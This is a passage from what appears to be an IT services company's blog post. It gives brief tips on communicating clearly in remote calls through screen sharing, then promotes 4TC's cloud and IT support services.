As remote calls have the opportunities and limitations of screen sharing and audio, by being detail-conscious and aware of how your audience may be digesting what you’re presenting, you can tailor your communication to be more detailed and clearer to ensure that everyone is on the same page in the discussion.  

To illustrate your points, share your screen. 

If required, you can screen-share information and documents for more clarity. You’ll save time and screen sharing helps others and yourself to learn more, more quickly.  

Want to capitalise on the potential of your technology? Contact 4TC Today 

4TC take time to understand the daily challenges that your business faces. We then provide cost-effective tech solutions to these issues that will help you save time, protect vital data, and enable you and your staff to be more effective with your time management. Alongside our proactive IT support, we will ensure that your staff are using the technology at their disposal in a way that works for them, whilst making sure that they are educated on how to use it as productively as possible. The right Cloud solution has the power to revolutionise your business forever – utilising your IT to its full potential is essential to guaranteeing that you and your business can thrive and grow into the future. If you would like to find out more on how 4TC Services can provide affordable tech management for your business, drop us an email or call us now for a full demonstration.